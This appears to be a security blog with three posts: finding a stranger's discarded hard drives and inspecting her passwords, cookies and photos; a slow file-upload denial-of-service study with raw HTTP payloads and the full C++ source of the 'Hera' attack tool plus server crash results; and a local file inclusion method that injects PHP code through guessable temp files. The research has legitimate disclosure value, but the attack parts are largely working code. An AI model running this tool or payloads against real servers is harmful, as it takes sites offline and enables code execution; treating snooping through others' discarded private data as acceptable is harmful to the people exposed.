Don’t litter

I’ve always hated it when people throw their trash around. My opinion of someone can go from “respectable citizen that I look up to” to “obvious douche-bag who doesn’t respect anyone but him/herself” if I see them throw stuff on the ground. I often see people do it, and I try to lecture them whenever I catch them in the act. My hope is of course that they will feel at least some bit of shame and maybe change their behaviour in the future.

Anyway, so near our apartment there’s this recycling station. A few containers where you can throw paper, plastic, metal and glass. The usual. Once a week there’s this pile of crap that keeps showing up. It almost always follows the same pattern and always ends up at the same spot, which makes me think that it might be the same person doing it. The trash in the pile is usually empty boxes from some fast food place (kebab and then some text in Arabic or something) and then usually a few electronics.

It always irritates me to the point where I would like to catch them in the act. But I never do. Well, until now. Or, I didn’t really catch them in the act; it was more about what they dumped this time. On Wednesday this week, in the morning when I was leaving some plastic in the container, I noticed something in the “illegally placed trash pile”: two computers (my time to shine)! I checked if there were any hard drives in them, and there were. So I decided that if the machines were still there when I came back after work, I would go there with a screwdriver and take out the drives. I was a bit worried, since it was the day when they usually empty the containers, so the risk was that they would just take the computers with them when they emptied everything else.

When I came back after work, the containers were empty but the computers were still there on the ground. So I went home, grabbed a screwdriver and went back. It was a strange case with a locking mechanism for the hard drives that was not easy to get off. Also, while I was sitting there in the dark with my screwdriver and flashlight, someone came to empty their recyclables. I quickly stood up and hid my stuff under a plastic bag, then proceeded to empty some plastic I had brought with me into the container (to seem less suspicious. It’s all about the looks!). When the person had left I continued with my secret mission, and managed to take out all three drives.

I plugged them into my dock at home and took a quick look at the first drive. Unformatted as expected, with Windows Vista installed (bleh). I created a virtual drive for VirtualBox so that I could try to start the operating system on it.

VBoxManage internalcommands createrawvmdk -filename "henrietta.vmdk" -rawdisk /dev/sdg

However, the operating system was damaged and the repair process didn’t seem to work. It might have been a driver issue, since it tried to load some ATI drivers before it crashed every time. I wasn’t too interested in spending a large amount of time on this, so I proceeded to just look at the data on the drive from my Linux machine. It appears to have been owned by a Ukrainian lady (both machines seem to have been owned by her). They could of course have been stolen from her, so I shouldn’t be too quick to blame. But I ruled that out, as the browser history and the programs installed all followed a consistent pattern, and all accounts saved in the browser (Chrome) were using the same email and password. For the sake of our lady of the day (Henrietta), I will not disclose any detailed personal info.

The first hard drive, the one with Windows Vista, contained everything I would need to hijack the target’s Internet life:

  • Browser history
  • Cookies
  • Email address (henr*************@hotmail.com)
  • Account names
  • Passwords
  • Personal files (A lot of text documents)
  • Images (hundreds)
  • Videos
  • Music

And loads of other sensitive data. I took a look at the data and then I threw everything away. No accounts were ever tested or anything unethical like that. One could argue that just taking these drives was unethical, but if you throw something on the ground with the intention of dumping it where it’s not supposed to be, you sort of resign your ownership of it. Still, there is the possibility of it being stolen. None of the operating systems on the machines worked, the hardware was very old, and some of the cards were even visibly broken. So I doubt it was stolen and then dumped there. Why would a thief go to the trouble of dumping it at “almost” the right location?

The second hard drive followed the same pattern, but had Windows XP installed on it. It belonged to the same user, and the same types of websites had been visited. It also had a data partition with hundreds of family photos, photos of the suspected owner, and all sorts of sensitive personal data.

The third drive was completely dead and I didn’t put any more time into it.

All drives will be given to a friend who will physically destroy them (take them apart and render them useless).

Anyway, if you’re a complete ass who can’t take responsibility for your crap and just throws everything around you as you please, at least don’t throw crap that could potentially be traced back to you. Or, maybe continue, so that it’s easier to catch you. Right, Henrietta?

Denial of service – Evil is an art form

Introduction

This article was originally planned to be part of a larger project, where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright, so I don’t really mind). I have decided to put more energy into the writing part of this little project instead, do more tests, and try to present some more interesting results.

The idea started with “people are so creative at messing up servers these days. I wanna do that”, and it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable, or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, which simply bombs a server with file uploads. It was not very efficient, and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as a base for the new Hera tool described below.

TL;DR

By uploading a large number of files to different server setups, and not finishing the uploads (utilizing slow attack methods), one can achieve one or several of the following effects:

  • Make the server unresponsive, or have it respond with an internal server error message
  • Fill up the disk space, with different effects depending on the server setup
  • Use up RAM and crash the whole server

Basically, the effects come down to the huge number of temporary files being saved to disk, the massive number of file handles being opened, or the data being stored in RAM instead of on disk. Which of the results above you reach depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 8
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of these effects are similar or identical to those of other attacks, such as Slowloris or Slowpost. The difference is that some servers will handle file uploads differently, and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low-end machine was that the disk space eventually ran out. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing when developing the tool I used Apache with mod_php on Linux. Most settings were defaults, apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later on when I list all the server results.

Now, the interesting part about uploading a file to a server is that the server has to store the data somewhere while the upload is being performed. Storing it in RAM is usually a bad idea, since it could lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. In the case of mod_php, the data will be uploaded and stored in a temporary file before it gets to your script/application. This was the first important thing I learned that made this slightly more exciting for me, because it means that as long as we have access to a PHP script on a server, any script, we can upload a file and have it stored temporarily. Of course the file will be removed when the script has finished running, which was the case with the Tsunami script (I made a script that ran very slowly to test this out. Didn’t get very promising results either way).
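To see the temporary file appear for yourself, here is a minimal sketch of a normal upload (the host is just one from my test network, and test.php can be an empty file):

import requests  # third-party: pip install requests

# While this request is in flight, mod_php buffers the upload in a
# /tmp/phpXXXXXX file and deletes it as soon as test.php finishes running.
with open("data.txt", "rb") as f:
    requests.post("http://192.168.0.209/test.php", files={"file": f})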

The code responsible for the upload can be found here.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c

The RFC in question for reference
https://www.ietf.org/rfc/rfc1867.txt

This part is interesting, since I needed to make sure what the default setting for file uploads was. If the default had been to not allow file uploads, this attack would have been slightly less interesting.

/* If file_uploads=off, skip the file part */
if (!PG(file_uploads)) {
    skip_upload = 1;
} else if (upload_cnt <= 0) {
    skip_upload = 1;
    sapi_module.sapi_error(E_WARNING, "Maximum number of allowable file uploads has been exceeded");
}

Luckily, it is set to on by default. This means that given any standard Apache installation with mod_php enabled, and at least one known PHP script reachable from the outside, this attack can be performed.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/main.c#L571

STD_PHP_INI_BOOLEAN("file_uploads", "1", PHP_INI_SYSTEM, OnUpdateBool, file_uploads, php_core_globals, core_globals)


https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-development#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On


https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On


As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c#L1021

if (!cancel_upload) {
    /* only bother to open temp file if we have data */
    blen = multipart_buffer_read(mbuff, buff, sizeof(buff), &end);
#if DEBUG_FILE_UPLOAD
    if (blen > 0) {
#else
    /* in non-debug mode we have no problem with 0-length files */
    {
#endif
        fd = php_open_temporary_fd_ex(PG(upload_tmp_dir), "php", &temp_filename, 1);
        upload_cnt--;
        if (fd == -1) {
            sapi_module.sapi_error(E_WARNING, "File upload error - unable to create a temporary file");
            cancel_upload = UPLOAD_ERROR_E;
        }
    }
}



So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/, should be enough. The test.php could theoretically be empty and this would still work. Uploading a file is easy enough: create a simple form in an HTML file and submit it with a file selected. Nothing new there. The file will get saved in /tmp, and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant; it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client wants. What if we could send a large file to the server and then not finish it, and have the server think we want to finish the upload by sending one byte at a time with very long intervals?

Sure enough, by setting a Content-Length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period, as long as we send some data once in a while (how often depends on the timeout settings). The original Content-Length of the request below was 16881, but I set it to 168810 to make the server wait for the rest of the data.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......


If we check /tmp we can see that the file is indeed there:

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/php5Ylw1J


jimmy@Enma /tmp $ cat /tmp/php5Ylw1J
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.....

The default settings allow us to upload a total of 20 files in the same request, with a max POST size of 8 MB. This makes the attack more useful, as we can now open 20 file descriptors per request instead of just 1 as I assumed before. In this first test I didn’t send any data after the first chunk, so the files were removed when the request timed out. But all files sent were there for the duration of the request.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......


Again, all files are saved as separate files in /tmp:

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/phpmESJII /tmp/phpQiDlOC /tmp/phps2zxLa
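
To recap the trick before moving on to the tool itself, here is a minimal Python sketch (same test host as before; the 10x Content-Length margin and the 5 second interval are arbitrary choices):

import socket
import time

HOST, PORT = "192.168.0.209", 80
BOUNDARY = "-" * 27 + "1825653778175343117546207648"

# A multipart body that starts one file upload but never closes it
body = (
    "--" + BOUNDARY + "\r\n"
    "Content-Disposition: form-data; name=\"file\"; filename=\"data.txt\"\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    + "a" * 16000
)
headers = (
    "POST /test.php HTTP/1.1\r\n"
    "Host: " + HOST + "\r\n"
    "Content-Type: multipart/form-data; boundary=" + BOUNDARY + "\r\n"
    # Claim far more data than we actually send, so the server keeps waiting
    "Content-Length: " + str(len(body) * 10) + "\r\n"
    "\r\n"
)

s = socket.create_connection((HOST, PORT))
s.sendall((headers + body).encode())
while True:
    time.sleep(5)       # stay well within the server's timeout
    s.sendall(b"a")     # one byte keeps the request, and /tmp/phpXXXXXX, alive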


Okay fine, so it works. Now what?

Well, now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow HTTP attack method), I need to write a tool that can utilize this to attack the target system. This is how the Hera tool was born (don’t put too much thought into the name; it made sense at first when a friend suggested it, but we can’t remember why).

https://github.com/jra89/Hera

#define _GLIBCXX_USE_CXX11_ABI 0

// NOTE: the header names were lost when this listing was originally posted
// (the angle brackets got stripped); the list below is a reconstruction
// based on what the code actually uses.
#include <iostream>
#include <sstream>
#include <iomanip>
#include <string>
#include <cstring>
#include <cstdlib>
#include <ctime>
#include <thread>
#include <vector>
#include <algorithm>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <arpa/inet.h>

using namespace std;

/*
~=Compile=~
g++ -std=c++11 -pthread main.cpp -o hera -lz

~=Run=~
./hera 192.168.0.209 80 5000 3 /test.php 0.03 20 0 0 20

~=Params=~
./hera host port threads connections path filesize files endfile gzip timeout

~=Increase maximum file descriptors=~
vim /etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

~=Increase buffer size for larger attacks=~

*/

string getTime()
{
    auto t = time(nullptr);
    auto tm = *localtime(&t);
    ostringstream out;
    out << put_time(&tm, "%Y-%m-%d %H:%M:%S");
    return out.str();
}

void print(string msg, bool mood)
{
    string datetime = getTime();
    if(mood)
    {
        cout << "[+][" << datetime << "] " << msg << endl;
    }
    else
    {
        cout << "[-][" << datetime << "] " << msg << endl;
    }
}

void *get_in_addr(struct sockaddr *sa)
{
    if (sa->sa_family == AF_INET)
    {
        return &(((struct sockaddr_in*)sa)->sin_addr);
    }

    return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int doConnect(string *payload, string *host, string *port)
{
    int sockfd;
    struct addrinfo hints, *servinfo, *p = NULL;
    int rv, val;
    char s[INET6_ADDRSTRLEN];

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    if ((rv = getaddrinfo(host->c_str(), port->c_str(), &hints, &servinfo)) != 0)
    {
        print("Unable to get host information", false);
    }

    while(!p)
    {
        for(p = servinfo; p != NULL; p = p->ai_next)
        {
            if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1)
            {
                print("Unable to create socket", false);
                continue;
            }

            if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1)
            {
                close(sockfd);
                print("Unable to connect", false);
                continue;
            }

            //connected = true;
            break;
        }
    }

    int failures = 0;
    while(send(sockfd, payload->c_str(), payload->size(), MSG_NOSIGNAL) < 0)
    {
        if(++failures == 5)
        {
            close(sockfd);
            return -1;
        }
    }

    freeaddrinfo(servinfo);
    return sockfd;

}

void attacker(string *payload, string *host, string *port, int numConns, bool gzip, int timeout)
{
    int sockfd[numConns];
    fill_n(sockfd, numConns, 0);
    string data = "a\n";

    while(true)
    {
        for(int i = 0; i < numConns; ++i)
        {
            if(sockfd[i] <= 0)
            {
                sockfd[i] = doConnect(payload, host, port);
            }
        }

        for(int i = 0; i < numConns; ++i)
        {
            if(send(sockfd[i], data.c_str(), data.size(), MSG_NOSIGNAL) < 0)
            {
                close(sockfd[i]);
                sockfd[i] = doConnect(payload, host, port);
            }
        }

        sleep(timeout);
    }
}

string gen_random(int len)
{
    char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    int alphaLen = sizeof(alphanum) - 1;
    string str = "";

    for(int i = 0; i < len; ++i)
    {
        str += alphanum[rand() % alphaLen];
    }

    return str;
}

string buildPayload(string host, string path, float fileSize, int numFiles, bool endFile, bool gzip)
{
    ostringstream payload;
    ostringstream body;
    int extraContent = (endFile) ? 0 : 100000;

    //Build the body
    for(int i = 0; i < numFiles; ++i)
    {
        body << "-----------------------------424199281147285211419178285\r\n";
        body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
        body << "Content-Type: text/plain\r\n\r\n";

        for(int n = 0; n < (int)(fileSize*100000); ++n)
        {
            body << "aaaaaaaaa\n";
        }
    }

    //If we want to end the stream of files, add ending boundary
    if(endFile)
    {
        body << "-----------------------------424199281147285211419178285--";
    }

    //Build headers
    payload << "POST " << path.c_str() << " HTTP/1.1\r\n";
    payload << "Host: " << host.c_str() << "\r\n";
    payload << "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n";
    payload << "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    payload << "Accept-Language: en-US,en;q=0.5\r\n";
    payload << "Accept-Encoding: gzip, deflate\r\n";
    payload << "Cache-Control: max-age=0\r\n";
    payload << "Connection: keep-alive\r\n";
    payload << "Content-Type: multipart/form-data; boundary=---------------------------424199281147285211419178285\r\n";
    payload << "Content-Length: " << body.str().size()+extraContent << "\r\n\r\n";
    payload << body.str() << "\r\n";

    return payload.str();
}

void help()
{
    string help =
    "./hera host port threads connections path filesize files endfile gzip timeout\n\n"
    "host\t\tHost to attack\n"
    "port\t\tPort to connect to\n"
    "threads\t\tNumber of threads to start\n"
    "connections\tConnections per thread\n"
    "path\t\tPath to post data to\n"
    "filesize\tSize per file in MB\n"
    "files\t\tNumber of files per request (Min 1)\n"
    "endfile\t\tEnd the last file in the request (0/1)\n"
    "gzip\t\tEnable or disable gzip compression\n"
    "timeout\t\tTimeout between sending of continuation data (to keep connection alive)\n";

    cout << help;
}

int main(int argc, char *argv[])
{
    cout << "~=Hera 0.7=~\n\n";

    if(argc < 11) // 10 arguments expected (argv[1]..argv[10])
    {
        help();
        exit(0);
    }

    string host = argv[1];
    string port = argv[2];
    int numThreads = atoi(argv[3]);
    int numConns = atoi(argv[4]);
    string path = argv[5];
    float fileSize = stof(argv[6]);
    int numFiles = atoi(argv[7]) > 0 ? atoi(argv[7]) : 2;
    bool endFile = atoi(argv[8]) == 1 ? true : false;
    bool gzip = atoi(argv[9]) == 1 ? true : false;
    float timeout = stof(argv[10]) < 0.1 ? 0.1 : stof(argv[10]);
    vector<thread> threadVector;

    print("Building payload", true);
    srand(time(0));
    string payload = buildPayload(host, path, fileSize, numFiles, endFile, gzip);
    //cout << payload << endl;

    print("Starting threads", true);
    for(int i = 0; i < numThreads; ++i)
    {
        threadVector.push_back(thread(attacker, &payload, &host, &port, numConns, gzip, timeout));
        usleep(100000); // sleep() only takes whole seconds; stagger thread start-up by 100 ms
    }

    for(int i = 0; i < numThreads; ++i)
    {
        threadVector[i].join();
    }
}


The version above is an older one; if you want to test the tool, I recommend that you clone the repository from GitHub (linked above). The newest version has support for gzip. However, the gzip experiment did not produce the results I expected, so support for sending gzip-compressed data will be removed from the tool in the future. The tool compiles and works just fine as it is right now, though. As the idea is to open a ton of connections to a target server, it is essential that you increase the number of file descriptors your system is allowed to use. This is usually set to something around 1024. The limit I have set in the example below can be anything, as long as you don’t reach it, because then the test might fail.

/etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000


This is also covered in the README on GitHub that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), I made and documented a number of tests to measure the effects this attack has on different systems. The effects differ quite a bit, and if you want to know whether this works on your own setup, the best way is to simply test it in a safe environment (like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 2GB
CPU Core: 1
HDD: 8GB

Basically, what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB each, but to leave some margin for headers and such I set it to 0.3 MB per file. There are two different ways I wanted to test this attack. The first is to send files as large as possible, which would fill up disk space and hopefully disrupt services as the machine runs out of space. The second is to send as many small files as possible and stress the server by opening too many file handles. As it turns out, both methods work well against different servers and setups, and either can prove fatal for the server depending on certain factors (setup, RAM, bandwidth, space etc.).

During the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread. There were 20 files per request and each file was set to 0.3 MB. That is 30 GB worth of data being sent to the server, so if it doesn’t dispose of that information it will have to save it either on disk or in RAM, neither of which is large enough. What happened was rather expected, actually.
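
The back-of-the-envelope math for that figure:

threads, sockets, files, mb_per_file = 2500, 2, 20, 0.3
print(threads * sockets * files * mb_per_file)   # 30000.0 MB, i.e. ~30 GB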

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after, so I configured the server to allow more connections (each thread is about 1 MB with this setup, making it very inefficient, but don’t worry, there are more test results further down). The server ran out of memory because of too many spawned Apache processes.


When the RAM was increased, the disk space on the server eventually ran out instead.

As expected, the number of files in the tmp folder exploded and kept the server CPU usage up the whole time (until the disk space ran out, of course, at which point no more files could be created).

During the attack the Apache server was unresponsive from the outside, and when the HDD space ran out it became responsive again.

An interesting effect appeared when I decided to halt the attack. The CPU went up to 100%, since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. The CPU stayed at 100% as the machine continued its attempt at removing the files and processes while I was forcing it to create new ones at the same time.

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test was conducted in a similar manner to the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable, and applications got killed one after another to preserve memory (Firefox and the task manager, for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup will be presented in a later test.

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to those of a normal Slowloris attack (that is, the Apache processes take up a lot of memory for every thread started; this is nothing new).


But we are still getting our desired effect of a huge number of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machine’s RAM to 8 GB, the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack, and by setting the timeout of the tool very low and the size of the files very small, the server CPU load could be kept at around 90-100% constantly (since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped, although this could not be reproduced easily, so I have yet to verify the cause. Another interesting effect of the attack was that the memory usage went up to 2.5-3 GB and never went down again after the attack had finished (trying to create a dump of the memory of the Apache process after the attack heavily messed up the machine, so I gave up on that for now).

The picture above was taken when the process became unresponsive and stopped accepting connections. That effect cannot be seen in the picture itself; what it shows is the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

In this test I tried the same tactic as before. One thing I immediately noticed was that with a lot of connections and few files per request, the max allowed connections limit was hit pretty fast (which is not surprising).

But with a lot of small files per request, something more interesting happened instead. It seemed to hit a max-open-files limit, which resulted in a 500 Internal Server Error instead of a refused connection. However, sending a small number of files but increasing the file size appeared to have the same effect, so this is probably the same effect as a Slowpost attack.

Changing worker_connections in /etc/nginx/nginx.conf to a higher value mostly fixed the first problem with opening a lot of Slowloris-like connections (small number of files only). But increasing the number of files to the maximum (20) per request quickly downed the server again, showing only an internal server error message. Changing the size of the data sent also had this effect, of course.
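
As a sketch, the change looks something like this (4096 is just an example value; tune it for your own test):

/etc/nginx/nginx.conf

events {
    # the default is often 768 or 1024; raising it lets nginx keep more
    # simultaneous (slow) connections open before refusing new ones
    worker_connections 4096;
}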

One thing I noticed is that nginx does not hand the data over to PHP until the request has finished transmitting. This does not stop the creation of files, since nginx needs to create temporary files as well, but it does stop the large number of files being created: nginx will only create one file per request, instead of a maximum of 20 like mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test ended very similarly to the nginx one. The server seems to save the data in a single temporary file, and did not seem to have a lot of problems with the number of connections to the server. In the end, when maxing the attack from the attacking test machine, the web server became unresponsive about 8 times out of 10. This was most likely more of a Slowloris/Slowpost type of effect than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively poor result (compared to the other setups) I decided to leave it at that for now. The server can be stressed, no doubt about that, but not in the way I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 16GB
CPU Core: 1
HDD: 30GB

This test was very special and was the last big test I wanted to make. The goal was to try the attack method on a larger, more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at http://rustytub.com, who (in exchange for candy, herring and beverages) helped me set up a realistic and stable server that could take a punch.

The first problem I had as the attacker was that the server would only create a single temporary file per request, instead of a maximum of 20 like I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being affected by my many uploaded files. This was because Werner had set it up so that the server would rather become unresponsive than crash catastrophically. This is of course preferable, and it defeated my tool in a way. So, to get my desired effect I actually had to raise the server’s max allowed connections a lot, so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near-default setups, but I felt it could be important to have some more realistic samples as well. And yes, I used hackme.biz for the final test.

The number of files specified above seemed to be the max I could reach. However, after the limit was reached something very interesting happened. The server appeared to store the files that could not be written to temporary files in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so it had finally managed to fill it all up.

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

Logging into the AWS account and checking the EC2 instances makes it clearer that the node has crashed. Now, of course, this could still mean that the effects we are seeing are the effects of a Slowloris attack, where the spawned processes are the ones using up all the memory. So to test that, I ran the same test with a Slowloris attack tool against this setup. The result was actually not that impressive, even when I tried using more connections than with the Hera tool.

As you can see, the memory usage for the same number of threads/connections is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

This time dumping memory was a lot easier, so I could check whether the data was still stored in memory even when the attack was idle (as in, not currently transmitting a lot of data, simply waiting for the timeout to occur). The data from the payload could be found in the process memory, which explains why the RAM usage went out of control like it did. I have not investigated this any further, though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method, but rather a new way of performing slow attacks against servers that handle file uploads badly. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to it or to other slow attacks, which became apparent during the tests (for example Slowpost on the nginx setups).

This method can be used for more than crashing servers. It can, for example, be used to guess temporary file names when all you have at your disposal is a file inclusion vulnerability. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Red Hat to see what they had to say about it. Apache said it does not directly affect them (which is true, since in the case of mod_php it is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads are not turned on by default. If you have read this article you will see that this is just not true, and I have asked them to clarify what they mean by that, without getting an answer. Red Hat were extremely helpful and even set up a test machine where they could see the effects of the tool. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method, and I also feel it should be okay for me to post this now without regretting it later due to breaking any responsible disclosure policies.

Thanks for reading!

Local file inclusion with tmp files

One thing I noticed while writing the Hera tool and doing all the tests is that some server setups did not have very good randomness in the names of their temporary files. This opens up some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following not very good code in an application:

<?php include($_GET['file']); ?>

It looks bad, and I promise it is not that unusual; we find it from time to time during our reviews.

And here are some temporary files that were created during the WAMP test I did while writing the Hera article. Notice that the random string after the “php” prefix is rather short, and should be easy to predict or brute force.

So to test this I modified Hera a bit, or more specifically the payload builder of the tool, to include a piece of PHP code at the end of every file uploaded to the server.

.....
//Build the body
for(int i = 0; i < numFiles; ++i)
{
    body << "-----------------------------424199281147285211419178285\r\n";
    body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
    body << "Content-Type: text/plain\r\n\r\n";

    for(int n = 0; n < (int)(fileSize*100000); ++n)
    {
        body << "aaaaaaaaa\n";
    }

    body << "<?='ThisShouldNotExist';?>\n";
}
.....

Notice the “ThisShouldNotExist”. If the code gets executed, that text will show up on the vulnerable page. Now we need another tool that constantly tries to include a set of temporary file names that we think will show up eventually. I wrote a simple Python script for this.

